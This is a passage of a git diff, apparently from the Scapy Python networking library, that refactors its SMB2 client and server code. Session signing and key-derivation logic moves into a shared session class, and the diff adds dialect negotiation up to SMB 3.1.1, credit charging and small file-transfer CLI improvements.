super(SMBStreamSocket, self).__init__(*args, **kwargs) + + def recv(self, x=None): + # note: normal StreamSocket takes care of NBTSession / DirectTCP fragments. + # this takes care of splitting compounded requests + if self.queue: + return self.queue.popleft() + pkt = super(SMBStreamSocket, self).recv(x) + if pkt is not None and SMB2_Header in pkt: + pay = pkt[SMB2_Header].payload + while SMB2_Header in pay: + pay = pay[SMB2_Header] + pay.underlayer.remove_payload() + self.queue.append(pay) + if not pay.NextCommand: + break + pay = pay.payload + return self.session.in_pkt(pkt) + + def send(self, x, Compounded=False, **kwargs): + for pkt in self.session.out_pkt(x, Compounded=Compounded): + return super(SMBStreamSocket, self).send(pkt, **kwargs) + + @staticmethod + def select(sockets, remain=conf.recv_poll_rate): + if any(getattr(x, "queue", None) for x in sockets): + return [x for x in sockets if isinstance(x, SMBStreamSocket) and x.queue] + return StreamSocket.select(sockets, remain=remain) + + +class SMBSession(DefaultSession): + """ + A SMB session within a TCP socket. + """ + + def __init__(self, *args, **kwargs): + self.smb_header = None + self.ssp = kwargs.pop("ssp", None) + self.sspcontext = kwargs.pop("sspcontext", None) + self.sniffsspcontexts = {} # Unfinished contexts for passive + # SMB session parameters + self.CompoundQueue = [] + self.Dialect = 0x0202 # Updated by parent + self.SecurityMode = 0 + # Crypto parameters + self.SMBSessionKey = None + self.PreauthIntegrityHashId = "SHA-512" + self.CipherId = "AES-128-CCM" + self.SigningAlgorithmId = "AES-CMAC" + self.Salt = os.urandom(32) + self.ConnectionPreauthIntegrityHashValue = None + self.SessionPreauthIntegrityHashValue = None + # SMB 3.1.1 + self.SessionPreauthIntegrityHashValue = None + if conf.winssps_passive: + for ssp in conf.winssps_passive: + self.sniffsspcontexts[ssp] = None + super(SMBSession, self).__init__(*args, **kwargs) + + # SMB crypto functions + + @crypto_validator + def computeSMBSessionKey(self): + if not self.sspcontext.SessionKey: + # no signing key, no session key + return + # [MS-SMB2] sect 3.3.5.5.3 + if self.Dialect >= 0x0300: + if self.Dialect == 0x0311: + label = b"SMBSigningKey\x00" + preauth_hash = self.SessionPreauthIntegrityHashValue + else: + label = b"SMB2AESCMAC\x00" + preauth_hash = b"SmbSign\x00" + # [MS-SMB2] sect 3.1.4.2 + if "256" in self.CipherId: + L = 256 + elif "128" in self.CipherId: + L = 128 + else: + raise ValueError + self.SMBSessionKey = SP800108_KDFCTR( + self.sspcontext.SessionKey[:16], + label, # label + preauth_hash, # context + L, + ) + elif self.Dialect <= 0x0210: + self.SMBSessionKey = self.sspcontext.SessionKey[:16] + else: + raise ValueError("Hmmm ? >:(") + + def computeSMBConnectionPreauth(self, *negopkts): + if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only + # [MS-SMB2] 3.3.5.4 + # TODO: handle SMB2_SESSION_FLAG_BINDING + if self.ConnectionPreauthIntegrityHashValue is None: + # New auth or failure + self.ConnectionPreauthIntegrityHashValue = b"\x00" * 64 + # Calculate the *Connection* PreauthIntegrityHashValue + for negopkt in negopkts: + self.ConnectionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + self.ConnectionPreauthIntegrityHashValue, + negopkt, + HashId=self.PreauthIntegrityHashId, + ) + ) + + def computeSMBSessionPreauth(self, *sesspkts): + if self.Dialect and self.Dialect >= 0x0311: # SMB 3.1.1 only + # [MS-SMB2] 3.3.5.5.3 + if self.SessionPreauthIntegrityHashValue is None: + # New auth or failure + self.SessionPreauthIntegrityHashValue = ( + self.ConnectionPreauthIntegrityHashValue + ) + # Calculate the *Session* PreauthIntegrityHashValue + for sesspkt in sesspkts: + self.SessionPreauthIntegrityHashValue = ( + SMB2computePreauthIntegrityHashValue( + self.SessionPreauthIntegrityHashValue, + sesspkt, + HashId=self.PreauthIntegrityHashId, + ) + ) + + # I/O + + def in_pkt(self, pkt): + """ + Incoming SMB packet + """ + return pkt + + def out_pkt(self, pkt, Compounded=False): + """ + Outgoing SMB packet + + :param pkt: the packet to send + :param Compound: if True, will be stack to be send with the next + un-compounded packet + + Handles: + - handle compounded requests (if any): [MS-SMB2] 3.3.5.2.7 + - handles signing (if required) + """ + # Note: impacket and wireshark get crazy on compounded+signature, but + # windows+samba tells we're right :D + if SMB2_Header in pkt: + if self.CompoundQueue: + # this is a subsequent compound: only keep the SMB2 + pkt = pkt[SMB2_Header] + if Compounded: + # [MS-SMB2] 3.2.4.1.4 + # "Compounded requests MUST be aligned on 8-byte boundaries; the + # last request of the compounded requests does not need to be padded to + # an 8-byte boundary." + # [MS-SMB2] 3.1.4.1 + # "If the message is part of a compounded chain, any + # padding at the end of the message MUST be used in the hash + # computation." + length = len(pkt[SMB2_Header]) + padlen = (-length) % 8 + if padlen: + pkt.add_payload(b"\x00" * padlen) + pkt[SMB2_Header].NextCommand = length + padlen + if self.Dialect and self.SMBSessionKey and self.SecurityMode != 0: + # Sign SMB2 ! + smb = pkt[SMB2_Header] + smb.Flags += "SMB2_FLAGS_SIGNED" + smb.sign( + self.Dialect, + self.SMBSessionKey, + # SMB 3.1.1 parameters: + SigningAlgorithmId=self.SigningAlgorithmId, + IsClient=False, + ) + if Compounded: + # There IS a next compound. Store in queue + self.CompoundQueue.append(pkt) + return [] + else: + # If there are any compounded responses in store, sum them + if self.CompoundQueue: + pkt = functools.reduce(lambda x, y: x / y, self.CompoundQueue) / pkt + self.CompoundQueue.clear() + return [pkt] + + def process(self, pkt: Packet): + # Called when passively sniffing + pkt = super(SMBSession, self).process(pkt) + if pkt is not None and SMB2_Header in pkt: + return self.in_pkt(pkt) + return pkt diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index deed13351a7..f63f095657d 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -76,14 +76,22 @@ SMB2_Change_Notify_Response, SMB2_Close_Request, SMB2_Close_Response, + SMB2_Create_Context, + SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, + SMB2_CREATE_REQUEST_LEASE_V2, SMB2_Create_Request, SMB2_Create_Response, + SMB2_Encryption_Capabilities, + SMB2_ENCRYPTION_CIPHERS, SMB2_Error_Response, SMB2_Header, SMB2_IOCTL_Request, SMB2_IOCTL_Response, + SMB2_Negotiate_Context, SMB2_Negotiate_Protocol_Request, SMB2_Negotiate_Protocol_Response, + SMB2_Netname_Negotiate_Context_ID, + SMB2_Preauth_Integrity_Capabilities, SMB2_Query_Directory_Request, SMB2_Query_Directory_Response, SMB2_Query_Info_Request, @@ -92,6 +100,8 @@ SMB2_Read_Response, SMB2_Session_Setup_Request, SMB2_Session_Setup_Response, + SMB2_SIGNING_ALGORITHMS, + SMB2_Signing_Capabilities, SMB2_Tree_Connect_Request, SMB2_Tree_Connect_Response, SMB2_Tree_Disconnect_Request, @@ -106,6 +116,21 @@ class SMB_Client(Automaton): + """ + SMB client automaton + + :param sock: the SMBStreamSocket to use + :param ssp: the SSP to use + + All other options (in caps) are optional, and SMB specific: + + :param REQUIRE_SIGNATURE: set 'Require Signature' + :param MIN_DIALECT: minimum SMB dialect. Defaults to 0x0202 (2.0.2) + :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0210 (2.1.0) + :param DIALECTS: list of supported SMB2 dialects. + Constructed from MIN_DIALECT, MAX_DIALECT otherwise. + """ + port = 445 cls = DirectTCP @@ -114,20 +139,31 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) self.USE_SMB1 = kwargs.pop("USE_SMB1", False) self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", False) - self.SecurityMode = kwargs.pop( - "SECURITY_MODE", - 3 if self.REQUIRE_SIGNATURE else int(bool(ssp)), - ) self.RETRY = kwargs.pop("RETRY", 0) # optionally: retry n times session setup self.SMB2 = kwargs.pop("SMB2", False) # optionally: start directly in SMB2 - self.DIALECTS = [ - 0x0202 - ] # XXX: add support for credit charge so we can upgrade this + self.SERVER_NAME = kwargs.pop("SERVER_NAME", "") + # Store supported dialects + if "DIALECTS" in kwargs: + self.DIALECTS = kwargs.pop("DIALECTS") + else: + MIN_DIALECT = kwargs.pop("MIN_DIALECT", 0x0202) + # MAX_DIALECT is currently SMB 2.0.2. 3.1.1 support is unfinished + self.MAX_DIALECT = kwargs.pop("MAX_DIALECT", 0x0202) + self.DIALECTS = sorted( + [ + x + for x in [0x0202, 0x0210, 0x0300, 0x0302, 0x0311] + if x >= MIN_DIALECT and x <= self.MAX_DIALECT + ] + ) # Internal Session information - self.Authenticated = False - self.Dialect = None self.IsGuest = False self.ErrorStatus = None + self.NegotiateCapabilities = None + self.GUID = RandUUID()._fix() + self.MaxTransactionSize = 0 + self.MaxReadSize = 0 + self.MaxWriteSize = 0 if ssp is None: # We got no SSP. Assuming the server allows anonymous ssp = SPNEGOSSP( @@ -138,17 +174,22 @@ def __init__(self, sock, ssp=None, *args, **kwargs): ) ] ) - self.ssp = ssp - self.sspcontext = None + # Initialize + kwargs["sock"] = sock Automaton.__init__( self, - recvsock=lambda **kwargs: sock, - ll=lambda **kwargs: sock, *args, **kwargs, ) if self.is_atmt_socket: self.smb_sock_ready = threading.Event() + # Set session options + self.session.ssp = ssp + self.session.SecurityMode = kwargs.pop( + "SECURITY_MODE", + 3 if self.REQUIRE_SIGNATURE else int(bool(ssp)), + ) + self.session.Dialect = self.MAX_DIALECT @classmethod def from_tcpsock(cls, sock, **kwargs): @@ -158,15 +199,49 @@ def from_tcpsock(cls, sock, **kwargs): **kwargs, ) + @property + def session(self): + # session shorthand + return self.sock.session + def send(self, pkt): - if self.Authenticated and self.sspcontext.SessionKey: - if isinstance(pkt.payload, SMB2_Header): - # Sign SMB2 ! - smb = pkt[SMB2_Header] - smb.Flags += "SMB2_FLAGS_SIGNED" - smb.sign(self.Dialect, self.sspcontext.SessionKey) - # TODO: compute creditscharge - # currently the client is stuck on 2.0.2 because of that + # Calculate what CreditCharge to send. + if self.session.Dialect > 0x0202 and isinstance(pkt.payload, SMB2_Header): + # [MS-SMB2] sect 3.2.4.1.5 + typ = type(pkt.payload.payload) + if typ is SMB2_Negotiate_Protocol_Request: + # See [MS-SMB2] 3.2.4.1.2 note + pkt.CreditCharge = 0 + elif typ in [ + SMB2_Read_Request, + SMB2_Write_Request, + SMB2_IOCTL_Request, + SMB2_Query_Directory_Request, + SMB2_Change_Notify_Request, + SMB2_Query_Info_Request, + ]: + # [MS-SMB2] 3.1.5.2 + # "For READ, WRITE, IOCTL, and QUERY_DIRECTORY requests" + # "CHANGE_NOTIFY, QUERY_INFO, or SET_INFO" + if typ == SMB2_Read_Request: + Length = pkt.payload.Length + elif typ == SMB2_Write_Request: + Length = len(pkt.payload.Data) + elif typ == SMB2_IOCTL_Request: + # [MS-SMB2] 3.3.5.15 + Length = max(len(pkt.payload.Input), pkt.payload.MaxOutputResponse) + elif typ in [ + SMB2_Query_Directory_Request, + SMB2_Change_Notify_Request, + SMB2_Query_Info_Request, + ]: + Length = pkt.payload.OutputBufferLength + else: + raise RuntimeError("impossible case") + pkt.CreditCharge = 1 + (Length - 1) // 65536 + else: + # "For all other requests, the client MUST set CreditCharge to 1" + pkt.CreditCharge = 1 return super(SMB_Client, self).send(pkt) @ATMT.state(initial=1) @@ -185,6 +260,7 @@ def send_negotiate(self): @ATMT.action(send_negotiate) def on_negotiate(self): + # [MS-SMB2] sect 3.2.4.2.2.1 - Multi-Protocol Negotiate self.smb_header = DirectTCP() / SMB_Header( Flags2=( "LONG_NAMES+EAS+NT_STATUS+UNICODE+" @@ -224,6 +300,79 @@ def on_negotiate(self): def SENT_NEGOTIATE(self): pass + @ATMT.state() + def SMB2_NEGOTIATE(self): + pass + + @ATMT.condition(SMB2_NEGOTIATE) + def send_negotiate_smb2(self): + raise self.SENT_NEGOTIATE() + + @ATMT.action(send_negotiate_smb2) + def on_negotiate_smb2(self): + # [MS-SMB2] sect 3.2.4.2.2.2 - SMB2-Only Negotiate + pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( + Dialects=self.DIALECTS, + SecurityMode=self.session.SecurityMode, + ) + if self.MAX_DIALECT >= 0x0210: + # "If the client implements the SMB 2.1 or SMB 3.x dialect, ClientGuid + # MUST be set to the global ClientGuid value" + pkt.ClientGUID = self.GUID + # Capabilities: same as [MS-SMB2] 3.3.5.4 + self.NegotiateCapabilities = "+".join( + [ + "DFS", + "LEASING", + "LARGE_MTU", + ] + ) + if self.MAX_DIALECT >= 0x0300: + # "if Connection.Dialect belongs to the SMB 3.x dialect family ..." + self.NegotiateCapabilities += "+" + "+".join( + [ + "MULTI_CHANNEL", + "PERSISTENT_HANDLES", + "DIRECTORY_LEASING", + ] + ) + if self.MAX_DIALECT >= 0x0300: + # "If the client implements the SMB 3.x dialect family, the client MUST + # set the Capabilities field as follows" + self.NegotiateCapabilities += "+ENCRYPTION" + if self.MAX_DIALECT >= 0x0311: + # "If the client implements the SMB 3.1.1 dialect, it MUST do" + pkt.NegotiateContexts = [ + SMB2_Negotiate_Context() + / SMB2_Preauth_Integrity_Capabilities( + # SHA-512 by default + HashAlgorithms=[self.session.PreauthIntegrityHashId], + Salt=self.session.Salt, + ), + SMB2_Negotiate_Context() + / SMB2_Encryption_Capabilities( + # AES-128-CCM by default + Ciphers=[self.session.CipherId], + ), + # TODO support compression and RDMA + SMB2_Negotiate_Context() + / SMB2_Netname_Negotiate_Context_ID( + NetName=self.SERVER_NAME, + ), + SMB2_Negotiate_Context() + / SMB2_Signing_Capabilities( + # AES-128-CCM by default + SigningAlgorithms=[self.session.SigningAlgorithmId], + ), + ] + pkt.Capabilities = self.NegotiateCapabilities + # Send + self.send(pkt) + # If required, compute sessions + self.session.computeSMBConnectionPreauth( + bytes(pkt[SMB2_Header]), # nego request + ) + @ATMT.receive_condition(SENT_NEGOTIATE) def receive_negotiate_response(self, pkt): if ( @@ -254,7 +403,29 @@ def receive_negotiate_response(self, pkt): raise self.SMB2_NEGOTIATE() else: if SMB2_Negotiate_Protocol_Response in pkt: - self.Dialect = pkt.DialectRevision + # SMB2 was negotiated ! + self.session.Dialect = pkt.DialectRevision + # If required, compute sessions + self.session.computeSMBConnectionPreauth( + bytes(pkt[SMB2_Header]), # nego response + ) + # Process max sizes + self.MaxReadSize = pkt.MaxReadSize + self.MaxTransactionSize = pkt.MaxTransactionSize + self.MaxWriteSize = pkt.MaxWriteSize + # Process NegotiateContext + if self.session.Dialect >= 0x0311 and pkt.NegotiateContextsCount: + for ngctx in pkt.NegotiateContexts: + if ngctx.ContextType == 0x0002: + # SMB2_ENCRYPTION_CAPABILITIES + self.session.CipherId = SMB2_ENCRYPTION_CIPHERS[ + ngctx.Ciphers[0] + ] + elif ngctx.ContextType == 0x0008: + # SMB2_SIGNING_CAPABILITIES + self.session.SigningAlgorithmId = ( + SMB2_SIGNING_ALGORITHMS[ngctx.SigningAlgorithms[0]] + ) self.update_smbheader(pkt) raise self.NEGOTIATED(ssp_blob) elif SMBNegotiate_Response_Security in pkt: @@ -262,32 +433,23 @@ def receive_negotiate_response(self, pkt): # Never tested. FIXME. probably broken raise self.NEGOTIATED(pkt.Challenge) - @ATMT.state() - def SMB2_NEGOTIATE(self): - pass - - @ATMT.condition(SMB2_NEGOTIATE) - def send_negotiate_smb2(self): - raise self.SENT_NEGOTIATE() - - @ATMT.action(send_negotiate_smb2) - def on_negotiate_smb2(self): - pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( - Dialects=self.DIALECTS, - Capabilities="DFS", - SecurityMode=self.SecurityMode, - ClientGUID=RandUUID()._fix(), - ) - self.send(pkt) - @ATMT.state() def NEGOTIATED(self, ssp_blob=None): - ssp_tuple = self.ssp.GSS_Init_sec_context( - self.sspcontext, + # Negotiated ! We now know the Dialect + if self.session.Dialect > 0x0202: + # [MS-SMB2] sect 3.2.5.1.4 + self.smb_header.CreditRequest = 1 + # Begin session establishment + ssp_tuple = self.session.ssp.GSS_Init_sec_context( + self.session.sspcontext, ssp_blob, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG - | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.SecurityMode != 0 else 0) + | ( + GSS_C_FLAGS.GSS_C_INTEG_FLAG + if self.session.SecurityMode != 0 + else 0 + ) ), ) return ssp_tuple @@ -298,8 +460,6 @@ def update_smbheader(self, pkt): """ # Some values should not be updated when ASYNC if not pkt.Flags.SMB2_FLAGS_ASYNC_COMMAND: - # [MS-SMB2] sect 3.2.5.1.4 - we charge what we are granted - self.smb_header.CreditCharge = pkt.CreditRequest # Update IDs self.smb_header.SessionId = pkt.SessionId self.smb_header.TID = pkt.TID @@ -320,7 +480,7 @@ def SENT_SETUP_ANDX_REQUEST(self): @ATMT.action(should_send_setup_andx_request) def send_setup_andx_request(self, ssp_tuple): - self.sspcontext, token, negResult = ssp_tuple + self.session.sspcontext, token, negResult = ssp_tuple self.smb_header.MID += 1 if self.SMB2 and negResult == GSS_S_CONTINUE_NEEDED: # New session: force 0 @@ -331,7 +491,7 @@ def send_setup_andx_request(self, ssp_tuple): # SMB2 pkt = self.smb_header.copy() / SMB2_Session_Setup_Request( Capabilities="DFS", - SecurityMode=self.SecurityMode, + SecurityMode=self.session.SecurityMode, ) else: # SMB1 extended @@ -357,6 +517,11 @@ def send_setup_andx_request(self, ssp_tuple): UnicodePassword=token, ) self.send(pkt) + if self.SMB2: + # If required, compute sessions + self.session.computeSMBSessionPreauth( + bytes(pkt[SMB2_Header]), # session request + ) @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) def receive_setup_andx_response(self, pkt): @@ -388,11 +553,16 @@ def receive_setup_andx_response(self, pkt): self.smb_header.SessionId = pkt.SessionId # SMB1 extended / SMB2 if pkt.Status == 0: # Authenticated - if SMB2_Session_Setup_Response in pkt and (pkt.SessionFlags.IS_GUEST): + if SMB2_Session_Setup_Response in pkt and pkt.SessionFlags.IS_GUEST: # We were 'authenticated' in GUEST self.IsGuest = True raise self.AUTHENTICATED(pkt.SecurityBlob) else: + if SMB2_Header in pkt: + # If required, compute sessions + self.session.computeSMBSessionPreauth( + bytes(pkt[SMB2_Header]), # session response + ) # Ongoing auth raise self.NEGOTIATED(pkt.SecurityBlob) elif SMBSession_Setup_AndX_Response_Extended_Security in pkt: @@ -400,7 +570,9 @@ def receive_setup_andx_response(self, pkt): pass elif SMB2_Error_Response in pkt: # Authentication failure - self.sspcontext = None + self.session.sspcontext = None + # Reset Session preauth (SMB 3.1.1) + self.session.SessionPreauthIntegrityHashValue = None if not self.RETRY: raise self.AUTH_FAILED() self.debug(lvl=2, msg="RETRY: %s" % self.RETRY) @@ -413,15 +585,16 @@ def AUTH_FAILED(self): @ATMT.state() def AUTHENTICATED(self, ssp_blob=None): - self.sspcontext, _, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, ssp_blob + self.session.sspcontext, _, status = self.session.ssp.GSS_Init_sec_context( + self.session.sspcontext, ssp_blob ) if status != GSS_S_COMPLETE: raise ValueError("Internal error: the SSP completed with an error.") + # Authentication was successful + self.session.computeSMBSessionKey() if self.IsGuest: # When authenticated in Guest, the sessionkey the client has is invalid - self.sspcontext.SessionKey = None - self.Authenticated = True + self.session.SMBSessionKey = None # DEV: add a condition on AUTHENTICATED with prio=0 @@ -526,7 +699,7 @@ def tree_connect(self, name): "Path", "\\\\%s\\%s" % ( - self.ins.atmt.sspcontext.ServerHostname, + self.ins.atmt.session.sspcontext.ServerHostname, name, ), ) @@ -582,6 +755,7 @@ def create_request( # Params depending on the type FileAttributes = [] CreateOptions = [] + CreateContexts = [] CreateDisposition = "FILE_OPEN" if type == "folder": FileAttributes.append("FILE_ATTRIBUTE_DIRECTORY") @@ -600,6 +774,31 @@ def create_request( FileAttributes.append("FILE_ATTRIBUTE_NORMAL") elif type: raise ValueError("Unknown type: %s" % type) + # SMB 3.11 + if self.ins.atmt.session.Dialect >= 0x0311 and type in ["file", "folder"]: + CreateContexts.extend( + [ + # [SMB2] sect 3.2.4.3.5 + SMB2_Create_Context( + Name=b"DH2Q", + Data=SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2( + CreateGuid=RandUUID()._fix() + ), + ), + # [SMB2] sect 3.2.4.3.9 + SMB2_Create_Context( + Name=b"MxAc", + ), + # [SMB2] sect 3.2.4.3.10 + SMB2_Create_Context( + Name=b"QFid", + ), + # [SMB2] sect 3.2.4.3.8 + SMB2_Create_Context( + Name=b"RqLs", Data=SMB2_CREATE_REQUEST_LEASE_V2() + ), + ] + ) # Extra options if extra_create_options: CreateOptions.extend(extra_create_options) @@ -614,6 +813,7 @@ def create_request( CreateOptions="+".join(CreateOptions), ShareAccess="+".join(ShareAccess), FileAttributes="+".join(FileAttributes), + CreateContexts=CreateContexts, Name=name, ), verbose=0, @@ -789,7 +989,7 @@ def send(self, x): SMB2_Read_Request( FileId=self.PipeFileId, ), - verbose=0 + verbose=0, ) data += resp.Data super(SMB_RPC_SOCKET, self).send(data) @@ -820,7 +1020,7 @@ def send(self, x): SMB2_Read_Request( FileId=self.PipeFileId, ), - verbose=0 + verbose=0, ) data += resp.Data super(SMB_RPC_SOCKET, self).send(data) @@ -865,6 +1065,8 @@ def __init__( ST=None, KEY=None, cli=True, + # SMB arguments + **kwargs, ): if cli: self._depcheck() @@ -937,15 +1139,15 @@ def __init__( sock = socket.socket(family, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((target, port)) - # SMB MTU: TODO negociate - self.MaxReadSize = self.MaxWriteSize = 65536 self.extra_create_options = [] # Wrap with the automaton self.timeout = timeout + kwargs.setdefault("SERVER_NAME", target) self.sock = SMB_Client.from_tcpsock( sock, ssp=ssp, debug=debug, + **kwargs, ) try: # Wrap with SMB_SOCKET @@ -982,7 +1184,7 @@ def __init__( print( "SMB authentication successful using %s%s !" % ( - repr(self.sock.atmt.sspcontext), + repr(self.sock.atmt.session.sspcontext), " as GUEST" if self.sock.atmt.IsGuest else "", ) ) @@ -1125,6 +1327,7 @@ def ls(self, parent=None): List the files in the remote directory -t: sort by timestamp -S: sort by size + -r: reverse while sorting """ if self._require_share(): return @@ -1151,7 +1354,7 @@ def ls(self, parent=None): return files @CLIUtil.addoutput(ls) - def ls_output(self, results, *, t=False, S=False): + def ls_output(self, results, *, t=False, S=False, r=False): """ Print the output of 'ls' """ @@ -1164,6 +1367,9 @@ def ls_output(self, results, *, t=False, S=False): if S: # Sort by size results.sort(key=lambda x: -x[2]) + if r: + # Reverse sort + results = results[::-1] results = [ ( x[0], @@ -1294,7 +1500,10 @@ def _get_file(self, file, fd): fileId = self.smbsock.create_request( self.normalize_path(fpath), type="file", - extra_create_options=self.extra_create_options, + extra_create_options=[ + "FILE_SEQUENTIAL_ONLY", + ] + + self.extra_create_options, ) # Get the file size info = FileAllInformation( @@ -1308,7 +1517,7 @@ def _get_file(self, file, fd): offset = 0 # Read the file while length: - lengthRead = min(self.MaxReadSize, length) + lengthRead = min(self.sock.atmt.MaxReadSize, length) fd.write( self.smbsock.read_request(fileId, Length=lengthRead, Offset=offset) ) @@ -1335,7 +1544,7 @@ def _send_file(self, fname, fd): # Send the file offset = 0 while True: - data = fd.read(self.MaxWriteSize) + data = fd.read(self.sock.atmt.MaxWriteSize) if not data: # end of file break @@ -1465,6 +1674,13 @@ def put(self, file): self.ls_cache.clear() return fname, size + @CLIUtil.addcomplete(put) + def put_complete(self, folder): + """ + Auto-complete put + """ + return self._lfs_complete(folder, lambda x: not x.is_dir()) + @CLIUtil.addcommand(spaces=True) def rm(self, file): """ @@ -1496,7 +1712,20 @@ def rm_complete(self, file): return [] return self._fs_complete(file) + @CLIUtil.addcommand() + def backup(self): + """ + Turn on or off backup intent + """ + if "FILE_OPEN_FOR_BACKUP_INTENT" in self.extra_create_options: + print("Backup Intent: Off") + self.extra_create_options.remove("FILE_OPEN_FOR_BACKUP_INTENT") + else: + print("Backup Intent: On") + self.extra_create_options.append("FILE_OPEN_FOR_BACKUP_INTENT") + if __name__ == "__main__": from scapy.utils import AutoArgparse + AutoArgparse(smbclient) diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index f3310fab340..e9fc4b416fe 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -17,9 +17,7 @@ `SMB `_ """ -import functools import hashlib -import os import pathlib import socket import struct @@ -27,7 +25,7 @@ from scapy.arch import get_if_addr from scapy.automaton import ATMT, Automaton -from scapy.config import conf, crypto_validator +from scapy.config import conf from scapy.error import log_runtime, log_interactive from scapy.volatile import RandUUID @@ -57,12 +55,12 @@ SMB_Header, ) from scapy.layers.smb2 import ( - DirectTCP, DFS_REFERRAL_ENTRY1, DFS_REFERRAL_V3, + DirectTCP, + FILE_BOTH_DIR_INFORMATION, FILE_FULL_DIR_INFORMATION, FILE_ID_BOTH_DIR_INFORMATION, - FILE_BOTH_DIR_INFORMATION, FILE_NAME_INFORMATION, FileAllInformation, FileAlternateNameInformation, @@ -78,15 +76,15 @@ FileStreamInformation, NETWORK_INTERFACE_INFO, SECURITY_DESCRIPTOR, - SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, - SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, - SMB2_CREATE_QUERY_ON_DISK_ID, SMB2_Cancel_Request, SMB2_Change_Notify_Request, SMB2_Change_Notify_Response, SMB2_Close_Request, SMB2_Close_Response, SMB2_Create_Context, + SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, + SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, + SMB2_CREATE_QUERY_ON_DISK_ID, SMB2_Create_Request, SMB2_Create_Response, SMB2_Echo_Request, @@ -96,8 +94,8 @@ SMB2_FILEID, SMB2_Header, SMB2_IOCTL_Network_Interface_Info, - SMB2_IOCTL_RESP_GET_DFS_Referral, SMB2_IOCTL_Request, + SMB2_IOCTL_RESP_GET_DFS_Referral, SMB2_IOCTL_Response, SMB2_IOCTL_Validate_Negotiate_Info_Response, SMB2_Negotiate_Context, @@ -121,16 +119,12 @@ SMB2_Tree_Disconnect_Response, SMB2_Write_Request, SMB2_Write_Response, - SMB2computePreauthIntegrityHashValue, SMBStreamSocket, SOCKADDR_STORAGE, SRVSVC_SHARE_TYPES, ) from scapy.layers.spnego import SPNEGOSSP -if conf.crypto_valid: - from scapy.libs.rfc3961 import SP800108_KDFCTR - # Import DCE/RPC from scapy.layers.msrpce.raw.ms_srvs import ( LPSERVER_INFO_101, @@ -295,26 +289,13 @@ def __init__(self, shares=[], ssp=None, verb=True, *args, **kwargs): self.rpc_server.extend(kwargs.pop("DCERPC_SERVER_CLS")) # Internal Session information self.SMB2 = False - self.Dialect = None self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() - self.SMBSessionKey = None - self.PreauthIntegrityHashId = "SHA-512" - self.CipherId = "AES-128-CCM" - self.SigningAlgorithmId = "AES-CMAC" - self.Salt = None - self.ConnectionPreauthIntegrityHashValue = None - self.SessionPreauthIntegrityHashValue = None # Compounds are handled on receiving by the StreamSocket, # and on aggregated in a CompoundQueue to be sent in one go self.NextCompound = False - self.CompoundQueue = [] self.CompoundedHandle = None # SSP provider - self.SecurityMode = kwargs.pop( - "SECURITY_MODE", - 3 if self.REQUIRE_SIGNATURE else bool(ssp), - ) if ssp is None: # No SSP => fallback on NTLM with guest ssp = SPNEGOSSP( @@ -327,10 +308,19 @@ def __init__(self, shares=[], ssp=None, verb=True, *args, **kwargs): ) if self.GUEST_LOGIN is None: self.GUEST_LOGIN = True - self.ssp = ssp - self.sspcontext = None # Initialize Automaton.__init__(self, *args, **kwargs) + # Set session options + self.session.ssp = ssp + self.session.SecurityMode = kwargs.pop( + "SECURITY_MODE", + 3 if self.REQUIRE_SIGNATURE else bool(ssp), + ) + + @property + def session(self): + # session shorthand + return self.sock.session def vprint(self, s=""): """ @@ -343,83 +333,7 @@ def vprint(self, s=""): print("> %s" % s) def send(self, pkt): - """ - Handles: - - handle compounded requests (if any): [MS-SMB2] 3.3.5.2.7 - - handles signing (if required) - """ - # Note: impacket and wireshark get crazy on compounded+signature, but - # windows+samba tells we're right :D - if SMB2_Header in pkt: - if self.CompoundQueue: - # this is a subsequent compound: only keep the SMB2 - pkt = pkt[SMB2_Header] - if self.NextCompound: - # [MS-SMB2] 3.2.4.1.4 - # "Compounded requests MUST be aligned on 8-byte boundaries; the - # last request of the compounded requests does not need to be padded to - # an 8-byte boundary." - # [MS-SMB2] 3.1.4.1 - # "If the message is part of a compounded chain, any - # padding at the end of the message MUST be used in the hash - # computation." - length = len(pkt[SMB2_Header]) - padlen = (-length) % 8 - if padlen: - pkt.add_payload(b"\x00" * padlen) - pkt[SMB2_Header].NextCommand = length + padlen - if self.Dialect and self.SMBSessionKey and self.SecurityMode != 0: - # Sign SMB2 ! - smb = pkt[SMB2_Header] - smb.Flags += "SMB2_FLAGS_SIGNED" - smb.sign( - self.Dialect, - self.SMBSessionKey, - # SMB 3.1.1 parameters: - SigningAlgorithmId=self.SigningAlgorithmId, - IsClient=False, - ) - if self.NextCompound: - # There IS a next compound. Store in queue - self.CompoundQueue.append(pkt) - return - else: - # If there are any compounded responses in store, sum them - if self.CompoundQueue: - pkt = functools.reduce(lambda x, y: x / y, self.CompoundQueue) / pkt - self.CompoundQueue.clear() - return super(SMB_Server, self).send(pkt) - - @crypto_validator - def computeSMBSessionKey(self): - if not self.sspcontext.SessionKey: - # no signing key, no session key - return - # [MS-SMB2] sect 3.3.5.5.3 - if self.Dialect >= 0x0300: - if self.Dialect == 0x0311: - label = b"SMBSigningKey\x00" - preauth_hash = self.SessionPreauthIntegrityHashValue - else: - label = b"SMB2AESCMAC\x00" - preauth_hash = b"SmbSign\x00" - # [MS-SMB2] sect 3.1.4.2 - if "256" in self.CipherId: 